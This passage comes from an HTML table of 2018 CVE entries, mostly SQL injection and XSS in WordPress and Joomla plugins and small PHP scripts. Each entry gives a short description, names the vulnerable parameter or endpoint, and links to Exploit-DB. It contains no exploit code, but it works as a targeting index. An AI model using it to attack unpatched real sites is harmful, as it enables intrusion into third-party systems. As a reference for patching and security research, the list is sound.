vulnerability in Geist WatchDog Console 3.2.2 allows remote authenticated administrators to inject arbitrary web script or HTML via a server description.</td><td><a href="https://www.exploit-db.com/exploits/44493">https://www.exploit-db.com/exploits/44493</a></td></tr><tr><td>CVE-2018-3811</td><td>SQL Injection vulnerability in the Oturia Smart Google Code Inserter plugin before 3.5 for WordPress allows unauthenticated attackers to execute SQL queries in the context of the web server. The saveGoogleAdWords() function in smartgooglecode.php did not use prepared statements and did not sanitize the $_POST["oId"] variable before passing it as input into the SQL query.</td><td><a href="https://www.exploit-db.com/exploits/43420">https://www.exploit-db.com/exploits/43420</a></td></tr><tr><td>CVE-2018-5315</td><td>The Wachipi WP Events Calendar plugin 1.0 for WordPress has SQL Injection via the event_id parameter to event.php.</td><td><a href="https://www.exploit-db.com/exploits/43479">https://www.exploit-db.com/exploits/43479</a></td></tr><tr><td>CVE-2018-5263</td><td>The StackIdeas EasyDiscuss (aka com_easydiscuss) extension before 4.0.21 for Joomla! allows XSS.</td><td><a href="https://www.exploit-db.com/exploits/43488">https://www.exploit-db.com/exploits/43488</a></td></tr><tr><td>CVE-2018-5370</td><td>BizLogic xnami 1.0 has XSS via the comment parameter in an addComment action to the /media/ajax URI.</td><td><a href="https://www.exploit-db.com/exploits/43535">https://www.exploit-db.com/exploits/43535</a></td></tr><tr><td>CVE-2018-5479</td><td>FoxSash ImgHosting 1.5 (according to footer information) is vulnerable to XSS attacks. The affected function is its search engine via the search parameter to the default URI. Since there is an user/admin login interface, it's possible for attackers to steal sessions of users and thus admin(s). 
By sending users an infected URL, code will be executed.</td><td><a href="https://www.exploit-db.com/exploits/43567">https://www.exploit-db.com/exploits/43567</a></td></tr><tr><td>CVE-2018-5688</td><td>ILIAS before 5.2.4 has XSS via the cmd parameter to the displayHeader function in setup/classes/class.ilSetupGUI.php in the Setup component.</td><td><a href="https://www.exploit-db.com/exploits/43595">https://www.exploit-db.com/exploits/43595</a></td></tr><tr><td>CVE-2018-5705</td><td>Reservo Image Hosting 1.6 is vulnerable to XSS attacks. The affected function is its search engine (the t parameter to the /search URI). Since there is an user/admin login interface, it's possible for attackers to steal sessions of users and thus admin(s). By sending users an infected URL, code will be executed.</td><td><a href="https://www.exploit-db.com/exploits/43676">https://www.exploit-db.com/exploits/43676</a></td></tr><tr><td>CVE-2018-5715</td><td>phprint.php in SugarCRM 3.5.1 has XSS via a parameter name in the query string (aka a $key variable).</td><td><a href="https://www.exploit-db.com/exploits/43683">https://www.exploit-db.com/exploits/43683</a></td></tr><tr><td>CVE-2018-5985</td><td>SQL Injection exists in the LiveCRM SaaS Cloud 1.0 component for Joomla! 
via an r=site/login&#x26;company_id= request.</td><td><a href="https://www.exploit-db.com/exploits/43860">https://www.exploit-db.com/exploits/43860</a></td></tr><tr><td>CVE-2018-5977</td><td>SQL Injection exists in Affiligator Affiliate Webshop Management System 2.1.0 via a search/?q=&#x26;price_type=range&#x26;price= request.</td><td><a href="https://www.exploit-db.com/exploits/43861">https://www.exploit-db.com/exploits/43861</a></td></tr><tr><td>CVE-2018-5986</td><td>SQL Injection exists in Easy Car Script 2014 via the s_order or s_row parameter to site_search.php.</td><td><a href="https://www.exploit-db.com/exploits/43863">https://www.exploit-db.com/exploits/43863</a></td></tr><tr><td>CVE-2018-5979</td><td>SQL Injection exists in Wchat Fully Responsive PHP AJAX Chat Script 1.5 via the login.php User field.</td><td><a href="https://www.exploit-db.com/exploits/43864">https://www.exploit-db.com/exploits/43864</a></td></tr><tr><td>CVE-2018-5978</td><td>SQL Injection exists in Facebook Style Php Ajax Chat Zechat 1.5 via the login.php User field.</td><td><a href="https://www.exploit-db.com/exploits/43865">https://www.exploit-db.com/exploits/43865</a></td></tr><tr><td>CVE-2018-5972</td><td>SQL Injection exists in Classified Ads CMS Quickad 4.0 via the keywords, placeid, cat, or subcat parameter to the listing URI.</td><td><a href="https://www.exploit-db.com/exploits/43868">https://www.exploit-db.com/exploits/43868</a></td></tr><tr><td>CVE-2018-5988</td><td>SQL Injection exists in Flexible Poll 1.2 via the id parameter to mobile_preview.php or index.php.</td><td><a href="https://www.exploit-db.com/exploits/43869">https://www.exploit-db.com/exploits/43869</a></td></tr><tr><td>CVE-2018-5973</td><td>SQL Injection exists in Professional Local Directory Script 1.0 via the sellers_subcategories.php IndustryID parameter, or the suppliers.php IndustryID or CategoryID parameter.</td><td><a 
href="https://www.exploit-db.com/exploits/43870">https://www.exploit-db.com/exploits/43870</a></td></tr><tr><td>CVE-2018-6363</td><td>SQL Injection exists in Task Rabbit Clone 1.0 via the single_blog.php id parameter.</td><td><a href="https://www.exploit-db.com/exploits/43914">https://www.exploit-db.com/exploits/43914</a></td></tr><tr><td>CVE-2018-6365</td><td>SQL Injection exists in TSiteBuilder 1.0 via the id parameter to /site.php, /pagelist.php, or /page_new.php.</td><td><a href="https://www.exploit-db.com/exploits/43915">https://www.exploit-db.com/exploits/43915</a></td></tr><tr><td>CVE-2018-6367</td><td>SQL Injection exists in Vastal I-Tech Buddy Zone Facebook Clone 2.9.9 via the /chat_im/chat_window.php request_id parameter or the /search_events.php category parameter.</td><td><a href="https://www.exploit-db.com/exploits/43918">https://www.exploit-db.com/exploits/43918</a></td></tr><tr><td>CVE-2018-6364</td><td>SQL Injection exists in Multilanguage Real Estate MLM Script through 3.0 via the /product-list.php srch parameter.</td><td><a href="https://www.exploit-db.com/exploits/43917">https://www.exploit-db.com/exploits/43917</a></td></tr><tr><td>CVE-2018-6398</td><td>SQL Injection exists in the CP Event Calendar 3.0.1 component for Joomla! via the id parameter in a task=load action.</td><td><a href="https://www.exploit-db.com/exploits/43932">https://www.exploit-db.com/exploits/43932</a></td></tr><tr><td>CVE-2018-6395</td><td>SQL Injection exists in the Visual Calendar 3.1.3 component for Joomla! via the id parameter in a view=load action.</td><td><a href="https://www.exploit-db.com/exploits/43933">https://www.exploit-db.com/exploits/43933</a></td></tr><tr><td>CVE-2018-6577</td><td>SQL Injection exists in the JEXTN Membership 3.1.0 component for Joomla! 
via the usr_plan parameter in a view=myplans&#x26;task=myplans.usersubscriptions request.</td><td><a href="https://www.exploit-db.com/exploits/43940">https://www.exploit-db.com/exploits/43940</a></td></tr><tr><td>CVE-2018-6578</td><td>SQL Injection exists in the JE PayperVideo 3.0.0 component for Joomla! via the usr_plan parameter in a view=myplans&#x26;task=myplans.usersubscriptions request.</td><td><a href="https://www.exploit-db.com/exploits/43948">https://www.exploit-db.com/exploits/43948</a></td></tr><tr><td>CVE-2018-6576</td><td>SQL Injection exists in Event Manager 1.0 via the event.php id parameter or the page.php slug parameter.</td><td><a href="https://www.exploit-db.com/exploits/43949">https://www.exploit-db.com/exploits/43949</a></td></tr><tr><td>CVE-2018-6579</td><td>SQL Injection exists in the JEXTN Reverse Auction 3.1.0 component for Joomla! via a view=products&#x26;uid= request.</td><td><a href="https://www.exploit-db.com/exploits/43950">https://www.exploit-db.com/exploits/43950</a></td></tr><tr><td>CVE-2018-6575</td><td>SQL Injection exists in the JEXTN Classified 1.0.0 component for Joomla! via a view=boutique&#x26;sid= request.</td><td><a href="https://www.exploit-db.com/exploits/43957">https://www.exploit-db.com/exploits/43957</a></td></tr><tr><td>CVE-2018-6581</td><td>SQL Injection exists in the JMS Music 1.1.1 component for Joomla! via a search with the keyword, artist, or username parameter.</td><td><a href="https://www.exploit-db.com/exploits/43959">https://www.exploit-db.com/exploits/43959</a></td></tr><tr><td>CVE-2018-6605</td><td>SQL Injection exists in the Zh BaiduMap 3.0.0.1 component for Joomla! via the id parameter in a getPlacemarkDetails, getPlacemarkHoverText, getPathHoverText, or getPathDetails request.</td><td><a href="https://www.exploit-db.com/exploits/43974">https://www.exploit-db.com/exploits/43974</a></td></tr><tr><td>CVE-2018-6604</td><td>SQL Injection exists in the Zh YandexMap 6.2.1.0 component for Joomla! 
via the id parameter in a task=getPlacemarkDetails request.</td><td><a href="https://www.exploit-db.com/exploits/43975">https://www.exploit-db.com/exploits/43975</a></td></tr><tr><td>CVE-2018-6582</td><td>SQL Injection exists in the Zh GoogleMap 8.4.0.0 component for Joomla! via the id parameter in a getPlacemarkDetails, getPlacemarkHoverText, getPathHoverText, or getPathDetails request.</td><td><a href="https://www.exploit-db.com/exploits/43976">https://www.exploit-db.com/exploits/43976</a></td></tr><tr><td>CVE-2018-6609</td><td>SQL Injection exists in the JSP Tickets 1.1 component for Joomla! via the ticketcode parameter in a ticketlist edit action, or the id parameter in a statuslist (or prioritylist) edit action.</td><td><a href="https://www.exploit-db.com/exploits/43978">https://www.exploit-db.com/exploits/43978</a></td></tr><tr><td>CVE-2018-6190</td><td>Netis WF2419 V3.2.41381 devices allow XSS via the Description field on the MAC Filtering page.</td><td><a href="https://www.exploit-db.com/exploits/43981">https://www.exploit-db.com/exploits/43981</a></td></tr><tr><td>CVE-2018-6845</td><td>PHP Scripts Mall Multi Language Olx Clone Script 2.0.6 has XSS via the Leave Comment field.</td><td><a href="https://www.exploit-db.com/exploits/44016">https://www.exploit-db.com/exploits/44016</a></td></tr><tr><td>CVE-2018-6888</td><td>An issue was discovered in Typesetter 5.1. 
The User Permissions page (aka Admin/Users) suffers from critical flaw of Cross Site Request forgery: using a forged HTTP request, a malicious user can lead a user to unknowingly create / delete or modify a user account due to the lack of an anti-CSRF token.</td><td><a href="https://www.exploit-db.com/exploits/44029">https://www.exploit-db.com/exploits/44029</a></td></tr><tr><td>CVE-2018-6940</td><td>A /shell?cmd= XSS issue exists in the HTTPD component of NAT32 v2.2 Build 22284 devices that can be exploited for Remote Code Execution in conjunction with CSRF.</td><td><a href="https://www.exploit-db.com/exploits/44033">https://www.exploit-db.com/exploits/44033</a></td></tr><tr><td>CVE-2018-5993</td><td>SQL Injection exists in the Aist through 2.0 component for Joomla! via the id parameter in a view=showvacancy request.</td><td><a href="https://www.exploit-db.com/exploits/44106">https://www.exploit-db.com/exploits/44106</a></td></tr><tr><td>CVE-2018-5990</td><td>SQL Injection exists in the AllVideos Reloaded 1.2.x component for Joomla! via the divid parameter.</td><td><a href="https://www.exploit-db.com/exploits/44107">https://www.exploit-db.com/exploits/44107</a></td></tr><tr><td>CVE-2018-6584</td><td>SQL Injection exists in the DT Register 3.2.7 component for Joomla! via a task=edit&#x26;id= request.</td><td><a href="https://www.exploit-db.com/exploits/44108">https://www.exploit-db.com/exploits/44108</a></td></tr><tr><td>CVE-2018-6373</td><td>SQL Injection exists in the Fastball 2.5 component for Joomla! via the season parameter in a view=player action.</td><td><a href="https://www.exploit-db.com/exploits/44109">https://www.exploit-db.com/exploits/44109</a></td></tr><tr><td>CVE-2018-6004</td><td>SQL Injection exists in the File Download Tracker 3.0 component for Joomla! 
via the dynfield[phone] or sess parameter.</td><td><a href="https://www.exploit-db.com/exploits/44110">https://www.exploit-db.com/exploits/44110</a></td></tr><tr><td>CVE-2018-5991</td><td>SQL Injection exists in the Form Maker 3.6.12 component for Joomla! via the id, from, or to parameter in a view=stats request, a different vulnerability than CVE-2015-2798.</td><td><a href="https://www.exploit-db.com/exploits/44111">https://www.exploit-db.com/exploits/44111</a></td></tr><tr><td>CVE-2018-5981</td><td>SQL Injection exists in the Gallery WD 1.3.6 component for Joomla! via the tag_id parameter or gallery_id parameter.</td><td><a href="https://www.exploit-db.com/exploits/44112">https://www.exploit-db.com/exploits/44112</a></td></tr><tr><td>CVE-2018-6396</td><td>SQL Injection exists in the Google Map Landkarten through 4.2.3 component for Joomla! via the cid or id parameter in a layout=form_markers action, or the map parameter in a layout=default action.</td><td><a href="https://www.exploit-db.com/exploits/44113">https://www.exploit-db.com/exploits/44113</a></td></tr><tr><td>CVE-2018-6394</td><td>SQL Injection exists in the InviteX 3.0.5 component for Joomla! via the invite_type parameter in a view=invites action.</td><td><a href="https://www.exploit-db.com/exploits/44114">https://www.exploit-db.com/exploits/44114</a></td></tr><tr><td>CVE-2018-6372</td><td>SQL Injection exists in the JB Bus 2.3 component for Joomla! via the order_number parameter.</td><td><a href="https://www.exploit-db.com/exploits/44115">https://www.exploit-db.com/exploits/44115</a></td></tr><tr><td>CVE-2018-5970</td><td>SQL Injection exists in the JGive 2.0.9 component for Joomla! via the filter_org_ind_type or campaign_countries parameter.</td><td><a href="https://www.exploit-db.com/exploits/44116">https://www.exploit-db.com/exploits/44116</a></td></tr><tr><td>CVE-2018-6368</td><td>SQL Injection exists in the JomEstate PRO through 3.7 component for Joomla! 
via the id parameter in a task=detailed action.</td><td><a href="https://www.exploit-db.com/exploits/44117">https://www.exploit-db.com/exploits/44117</a></td></tr><tr><td>CVE-2018-6006</td><td>SQL Injection exists in the JS Autoz 1.0.9 component for Joomla! via the vtype, pre, or prs parameter.</td><td><a href="https://www.exploit-db.com/exploits/44119">https://www.exploit-db.com/exploits/44119</a></td></tr><tr><td>CVE-2018-5994</td><td>SQL Injection exists in the JS Jobs 1.1.9 component for Joomla! via the zipcode parameter in a newest-jobs request, or the ta parameter in a view_resume request.</td><td><a href="https://www.exploit-db.com/exploits/44120">https://www.exploit-db.com/exploits/44120</a></td></tr><tr><td>CVE-2018-5971</td><td>SQL Injection exists in the MediaLibrary Free 4.0.12 component for Joomla! via the id parameter or the mid array parameter.</td><td><a href="https://www.exploit-db.com/exploits/44122">https://www.exploit-db.com/exploits/44122</a></td></tr><tr><td>CVE-2018-6024</td><td>SQL Injection exists in the Project Log 1.5.3 component for Joomla! via the search parameter.</td><td><a href="https://www.exploit-db.com/exploits/44124">https://www.exploit-db.com/exploits/44124</a></td></tr><tr><td>CVE-2018-6005</td><td>SQL Injection exists in the Realpin through 1.5.04 component for Joomla! via the pinboard parameter.</td><td><a href="https://www.exploit-db.com/exploits/44125">https://www.exploit-db.com/exploits/44125</a></td></tr><tr><td>CVE-2018-5974</td><td>SQL Injection exists in the SimpleCalendar 3.1.9 component for Joomla! via the catid array parameter.</td><td><a href="https://www.exploit-db.com/exploits/44126">https://www.exploit-db.com/exploits/44126</a></td></tr><tr><td>CVE-2018-5975</td><td>SQL Injection exists in the Smart Shoutbox 3.0.0 component for Joomla! 
via the shoutauthor parameter to the archive URI.</td><td><a href="https://www.exploit-db.com/exploits/44127">https://www.exploit-db.com/exploits/44127</a></td></tr><tr><td>CVE-2018-5980</td><td>SQL Injection exists in the Solidres 2.5.1 component for Joomla! via the direction parameter in a hub.search action.</td><td><a href="https://www.exploit-db.com/exploits/44128">https://www.exploit-db.com/exploits/44128</a></td></tr><tr><td>CVE-2018-5992</td><td>SQL Injection exists in the Staff Master through 1.0 RC 1 component for Joomla! via the name parameter in a view=staff request.</td><td><a href="https://www.exploit-db.com/exploits/44129">https://www.exploit-db.com/exploits/44129</a></td></tr><tr><td>CVE-2018-6583</td><td>SQL Injection exists in the Timetable Responsive Schedule 1.5 component for Joomla! via a view=event&#x26;alias= request.</td><td><a href="https://www.exploit-db.com/exploits/44130">https://www.exploit-db.com/exploits/44130</a></td></tr><tr><td>CVE-2018-5987</td><td>SQL Injection exists in the Pinterest Clone Social Pinboard 2.0 component for Joomla! via the pin_id or user_id parameter in a task=getlikeinfo action, the ends parameter in a view=gift action, the category parameter in a view=home action, the uid parameter in a view=pindisplay action, the searchVal parameter in a view=search action, or the uid parameter in a view=likes action.</td><td><a href="https://www.exploit-db.com/exploits/44131">https://www.exploit-db.com/exploits/44131</a></td></tr><tr><td>CVE-2018-5989</td><td>SQL Injection exists in the ccNewsletter 2.x component for Joomla! via the id parameter in a task=removeSubscriber action, a related issue to CVE-2011-5099.</td><td><a href="https://www.exploit-db.com/exploits/44132">https://www.exploit-db.com/exploits/44132</a></td></tr><tr><td>CVE-2018-7180</td><td>SQL Injection exists in the Saxum Astro 4.0.14 component for Joomla! 
via the publicid parameter.</td><td><a href="https://www.exploit-db.com/exploits/44133">https://www.exploit-db.com/exploits/44133</a></td></tr><tr><td>CVE-2018-7177</td><td>SQL Injection exists in the Saxum Numerology 3.0.4 component for Joomla! via the publicid parameter.</td><td><a href="https://www.exploit-db.com/exploits/44134">https://www.exploit-db.com/exploits/44134</a></td></tr><tr><td>CVE-2018-7179</td><td>SQL Injection exists in the SquadManagement 1.0.3 component for Joomla! via the id parameter.</td><td><a href="https://www.exploit-db.com/exploits/44135">https://www.exploit-db.com/exploits/44135</a></td></tr><tr><td>CVE-2018-7178</td><td>SQL Injection exists in the Saxum Picker 3.2.10 component for Joomla! via the publicid parameter.</td><td><a href="https://www.exploit-db.com/exploits/44136">https://www.exploit-db.com/exploits/44136</a></td></tr><tr><td>CVE-2018-7176</td><td>FrontAccounting 2.4.3 suffers from a CSRF flaw, which leads to adding a user account via admin/users.php (aka the "add user" feature of the User Permissions page).</td><td><a href="https://www.exploit-db.com/exploits/44137">https://www.exploit-db.com/exploits/44137</a></td></tr><tr><td>CVE-2018-7198</td><td>October CMS through 1.0.431 allows XSS by entering HTML on the Add Posts page.</td><td><a href="https://www.exploit-db.com/exploits/44144">https://www.exploit-db.com/exploits/44144</a></td></tr><tr><td>CVE-2018-7313</td><td>SQL Injection exists in the CW Tags 2.0.6 component for Joomla! via the searchtext array parameter.</td><td><a href="https://www.exploit-db.com/exploits/44158">https://www.exploit-db.com/exploits/44158</a></td></tr><tr><td>CVE-2018-7314</td><td>SQL Injection exists in the PrayerCenter 3.0.2 component for Joomla! 
via the sessionid parameter, a different vulnerability than CVE-2008-6429.</td><td><a href="https://www.exploit-db.com/exploits/44160">https://www.exploit-db.com/exploits/44160</a></td></tr><tr><td>CVE-2018-7315</td><td>SQL Injection exists in the Ek Rishta 2.9 component for Joomla! via the gender, age1, age2, religion, mothertounge, caste, or country parameter.</td><td><a href="https://www.exploit-db.com/exploits/44161">https://www.exploit-db.com/exploits/44161</a></td></tr><tr><td>CVE-2018-5983</td><td>SQL Injection exists in the JquickContact 1.3.2.2.1 component for Joomla! via a task=refresh&#x26;sid= request.</td><td><a href="https://www.exploit-db.com/exploits/44118">https://www.exploit-db.com/exploits/44118</a></td></tr><tr><td>CVE-2018-6585</td><td>SQL Injection exists in the JTicketing 2.0.16 component for Joomla! via a view=events action with a filter_creator or filter_events_cat parameter.</td><td><a href="https://www.exploit-db.com/exploits/44121">https://www.exploit-db.com/exploits/44121</a></td></tr><tr><td>CVE-2018-9205</td><td>Vulnerability in avatar_uploader v7.x-1.0-beta8 , The code in view.php doesn't verify users or sanitize the file path.</td><td><a href="https://www.exploit-db.com/exploits/44501">https://www.exploit-db.com/exploits/44501</a></td></tr><tr><td>CVE-2018-10109</td><td>Monstra CMS 3.0.4 has a stored XSS vulnerability when an attacker has access to the editor role, and enters the payload in the content section of a new page in the blog catalog.</td><td><a href="https://www.exploit-db.com/exploits/44502">https://www.exploit-db.com/exploits/44502</a></td></tr><tr><td>CVE-2018-10310</td><td>A persistent cross-site scripting vulnerability has been identified in the web interface of the Catapult UK Cookie Consent plugin before 2.3.10 for WordPress that allows the execution of arbitrary HTML/script code in the context of a victim's browser.</td><td><a 
href="https://www.exploit-db.com/exploits/44503">https://www.exploit-db.com/exploits/44503</a></td></tr><tr><td>CVE-2018-10312</td><td>index.php?m=member&#x26;v=pw_reset in WUZHI CMS 4.1.0 allows CSRF to change the password of a common member.</td><td><a href="https://www.exploit-db.com/exploits/44504">https://www.exploit-db.com/exploits/44504</a></td></tr><tr><td>CVE-2018-9137</td><td>Open-AudIT before 2.2 has CSV Injection.</td><td><a href="https://www.exploit-db.com/exploits/44511">https://www.exploit-db.com/exploits/44511</a></td></tr><tr><td>CVE-2018-10258</td><td>A CSV Injection vulnerability was discovered in Shopy Point of Sale v1.0 that allows a user with low level privileges to inject a command that will be included in the exported CSV file, leading to possible code execution.</td><td><a href="https://www.exploit-db.com/exploits/44534">https://www.exploit-db.com/exploits/44534</a></td></tr><tr><td>CVE-2018-10255</td><td>A CSV Injection vulnerability was discovered in clustercoding Blog Master Pro v1.0 that allows a user with low level privileges to inject a command that will be included in the exported CSV file, leading to possible code execution.</td><td><a href="https://www.exploit-db.com/exploits/44535">https://www.exploit-db.com/exploits/44535</a></td></tr><tr><td>CVE-2018-10257</td><td>A CSV Injection vulnerability was discovered in HRSALE The Ultimate HRM v1.0.2 that allows a user with low level privileges to inject a command that will be included in the exported CSV file, leading to possible code execution.</td><td><a href="https://www.exploit-db.com/exploits/44536">https://www.exploit-db.com/exploits/44536</a></td></tr><tr><td>CVE-2018-10256</td><td>A SQL Injection vulnerability was discovered in HRSALE The Ultimate HRM v1.0.2 that allows a user with low level privileges to directly modify the SQL query.</td><td><a 
href="https://www.exploit-db.com/exploits/44537">https://www.exploit-db.com/exploits/44537</a></td></tr><tr><td>CVE-2018-10259</td><td>An Authenticated Stored XSS vulnerability was found in HRSALE The Ultimate HRM v1.0.2, exploitable by a low privileged user.</td><td><a href="https://www.exploit-db.com/exploits/44538">https://www.exploit-db.com/exploits/44538</a></td></tr><tr><td>CVE-2018-10260</td><td>A Local File Inclusion vulnerability was found in HRSALE The Ultimate HRM v1.0.2, exploitable by a low privileged user.</td><td><a href="https://www.exploit-db.com/exploits/44539">https://www.exploit-db.com/exploits/44539</a></td></tr><tr><td>CVE-2018-7602</td><td>A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild.</td><td><a href="https://www.exploit-db.com/exploits/44542">https://www.exploit-db.com/exploits/44542</a></td></tr><tr><td>CVE-2018-10366</td><td>An issue was discovered in the Users (aka Front-end user management) plugin 1.4.5 for October CMS. XSS exists in the name field.</td><td><a href="https://www.exploit-db.com/exploits/44546">https://www.exploit-db.com/exploits/44546</a></td></tr><tr><td>CVE-2018-10365</td><td>An XSS issue was discovered in the Threads to Link plugin 1.3 for MyBB. When editing a thread, the user is given the option to convert the thread to a link. 
The thread link input box is not properly sanitized.</td><td><a href="https://www.exploit-db.com/exploits/44547">https://www.exploit-db.com/exploits/44547</a></td></tr><tr><td>CVE-2018-10321</td><td>Frog CMS 0.9.5 has a stored Cross Site Scripting Vulnerability via "Admin Site title" in Settings.</td><td><a href="https://www.exploit-db.com/exploits/44551">https://www.exploit-db.com/exploits/44551</a></td></tr><tr><td>CVE-2018-10504</td><td>The WebDorado "Form Maker by WD" plugin before 1.12.24 for WordPress allows CSV injection.</td><td><a href="https://www.exploit-db.com/exploits/44559">https://www.exploit-db.com/exploits/44559</a></td></tr><tr><td>CVE-2018-10309</td><td>The Responsive Cookie Consent plugin before 1.8 for WordPress mishandles number fields, leading to XSS.</td><td><a href="https://www.exploit-db.com/exploits/44563">https://www.exploit-db.com/exploits/44563</a></td></tr><tr><td>CVE-2018-10371</td><td>An issue was discovered in the wunderfarm WF Cookie Consent plugin 1.1.3 for WordPress. 
A persistent cross-site scripting vulnerability has been identified in the web interface of the plugin that allows the execution of arbitrary HTML/script code to be executed in a victim's web browser via a page title.</td><td><a href="https://www.exploit-db.com/exploits/44585">https://www.exploit-db.com/exploits/44585</a></td></tr><tr><td>CVE-2018-10757</td><td>CSP MySQL User Manager 2.3.1 allows SQL injection, and resultant Authentication Bypass, via a crafted username during a login attempt.</td><td><a href="https://www.exploit-db.com/exploits/44589">https://www.exploit-db.com/exploits/44589</a></td></tr><tr><td>CVE-2018-10580</td><td>The "Latest Posts on Profile" plugin 1.1 for MyBB has XSS because there is an added section in a user profile that displays that user's most recent posts without sanitizing the tsubject (aka thread subject) field.</td><td><a href="https://www.exploit-db.com/exploits/44608">https://www.exploit-db.com/exploits/44608</a></td></tr><tr><td>CVE-2018-9155</td><td>Cross-site scripting (XSS) vulnerability in Open-AudIT Professional 2.1.1 allows remote attackers to inject arbitrary web script or HTML via a crafted name of a component, as demonstrated by the Admin->Logs section (with a logs?logs.type= URI) and the Manage->Attributes section (via the "Name (display)" field to the attributes/create URI).</td><td><a href="https://www.exploit-db.com/exploits/44612">https://www.exploit-db.com/exploits/44612</a></td></tr><tr><td>CVE-2018-10314</td><td>Cross-site scripting (XSS) vulnerability in Open-AudIT Community 2.2.0 allows remote attackers to inject arbitrary web script or HTML via a crafted name of a component, as demonstrated by the action parameter in the Discover -> Audit Scripts -> List Scripts -> Download section.</td><td><a href="https://www.exploit-db.com/exploits/44613">https://www.exploit-db.com/exploits/44613</a></td></tr><tr><td>CVE-2018-10313</td><td>WUZHI CMS 4.1.0 allows persistent XSS via the form%5Bqq_10%5D parameter to the 
/index.php?m=member&#x26;f=index&#x26;v=profile&#x26;set_iframe=1 URI.</td><td><a href="https://www.exploit-db.com/exploits/44617">https://www.exploit-db.com/exploits/44617</a></td></tr><tr><td>CVE-2018-10311</td><td>A vulnerability was discovered in WUZHI CMS 4.1.0. There is persistent XSS that allows remote attackers to inject arbitrary web script or HTML via the tag[pinyin] parameter to the /index.php?m=tags&#x26;f=index&#x26;v=add URI.</td><td><a href="https://www.exploit-db.com/exploits/44618">https://www.exploit-db.com/exploits/44618</a></td></tr><tr><td>CVE-2018-5430</td><td>The Spring web flows of TIBCO Software Inc.'s TIBCO JasperReports Server, TIBCO JasperReports Server Community Edition, TIBCO JasperReports Server for ActiveMatrix BPM, TIBCO Jaspersoft for AWS with Multi-Tenancy, and TIBCO Jaspersoft Reporting and Analytics for AWS contain a vulnerability which may allow any authenticated user read-only access to the contents of the web application, including key configuration files. Affected releases include TIBCO Software Inc.'s TIBCO JasperReports Server: versions up to and including 6.2.4; 6.3.0; 6.3.2; 6.3.3;6.4.0; 6.4.2, TIBCO JasperReports Server Community Edition: versions up to and including 6.4.2, TIBCO JasperReports Server for ActiveMatrix BPM: versions up to and including 6.4.2, TIBCO Jaspersoft for AWS with Multi-Tenancy: versions up to and including 6.4.2, TIBCO Jaspersoft Reporting and Analytics for AWS: versions up to and including 6.4.2.</td><td><a href="https://www.exploit-db.com/exploits/44623">https://www.exploit-db.com/exploits/44623</a></td></tr><tr><td>CVE-2018-7465</td><td>An XSS issue was discovered in VirtueMart before 3.2.14. All the textareas in the backend of the plugin can be closed by simply adding &#x3C;/textarea> to the value and saving the product/config. 
By editing back the product/config, the editor's browser will execute everything after the &#x3C;/textarea>, leading to a possible XSS.</td><td><a href="https://www.exploit-db.com/exploits/44625">https://www.exploit-db.com/exploits/44625</a></td></tr><tr><td>CVE-2018-1247</td><td>RSA Authentication Manager Security Console, version 8.3 and earlier, contains a XML External Entity (XXE) vulnerability. This could potentially allow admin users to cause a denial of service or extract server data via injecting a maliciously crafted DTD in an XML file submitted to the application.</td><td><a href="https://www.exploit-db.com/exploits/44634">https://www.exploit-db.com/exploits/44634</a></td></tr><tr><td>CVE-2018-9163</td><td>A stored Cross-site scripting (XSS) vulnerability in Zoho ManageEngine Recovery Manager Plus before 5.3 (Build 5350) allows remote authenticated users (with Add New Technician permissions) to inject arbitrary web script or HTML via the loginName field to technicianAction.do.</td><td><a href="https://www.exploit-db.com/exploits/44666">https://www.exploit-db.com/exploits/44666</a></td></tr><tr><td>CVE-2018-11339</td><td>An XSS issue was discovered in Frappe ERPNext v11.x.x-develop b1036e5 via a comment.</td><td><a href="https://www.exploit-db.com/exploits/44691">https://www.exploit-db.com/exploits/44691</a></td></tr><tr><td>CVE-2018-11443</td><td>The parameter q is affected by Cross-site Scripting in jobcard-ongoing.php in EasyService Billing 1.0.</td><td><a href="https://www.exploit-db.com/exploits/44764">https://www.exploit-db.com/exploits/44764</a></td></tr><tr><td>CVE-2018-11444</td><td>A SQL Injection issue was observed in the parameter "q" in jobcard-ongoing.php in EasyService Billing 1.0.</td><td><a href="https://www.exploit-db.com/exploits/44765">https://www.exploit-db.com/exploits/44765</a></td></tr><tr><td>CVE-2018-11332</td><td>Stored cross-site scripting (XSS) vulnerability in the "Site Name" field found in the "site" tab under configurations 
in ClipperCMS 1.3.3 allows remote attackers to inject arbitrary web script or HTML via a crafted site name to the manager/processors/save_settings.processor.php file.</td><td><a href="https://www.exploit-db.com/exploits/44775">https://www.exploit-db.com/exploits/44775</a></td></tr><tr><td>CVE-2018-11403</td><td>DomainMod v4.09.03 has XSS via the assets/edit/account-owner.php oid parameter.</td><td><a href="https://www.exploit-db.com/exploits/44782">https://www.exploit-db.com/exploits/44782</a></td></tr><tr><td>CVE-2018-11404</td><td>DomainMod v4.09.03 has XSS via the assets/edit/ssl-provider-account.php sslpaid parameter.</td><td><a href="https://www.exploit-db.com/exploits/44783">https://www.exploit-db.com/exploits/44783</a></td></tr><tr><td>CVE-2018-11512</td><td>Stored cross-site scripting (XSS) vulnerability in the "Website's name" field found in the "Settings" page under the "General" menu in Creatiwity wityCMS 0.6.1 allows remote attackers to inject arbitrary web script or HTML via a crafted website name by doing an authenticated POST HTTP request to admin/settings/general.</td><td><a href="https://www.exploit-db.com/exploits/44790">https://www.exploit-db.com/exploits/44790</a></td></tr><tr><td>CVE-2018-11535</td><td>An issue was discovered in SITEMAKIN SLAC (Site Login and Access Control) v1.0. The parameter "my_item_search" in users.php is exploitable using SQL injection.</td><td><a href="https://www.exploit-db.com/exploits/44793">https://www.exploit-db.com/exploits/44793</a></td></tr><tr><td>CVE-2018-11523</td><td>upload.php on NUUO NVRmini 2 devices allows Arbitrary File Upload, such as upload of .php files.</td><td><a href="https://www.exploit-db.com/exploits/44794">https://www.exploit-db.com/exploits/44794</a></td></tr><tr><td>CVE-2018-11532</td><td>An issue was discovered in the ChangUonDyU Advanced Statistics plugin 1.0.2 for MyBB. 
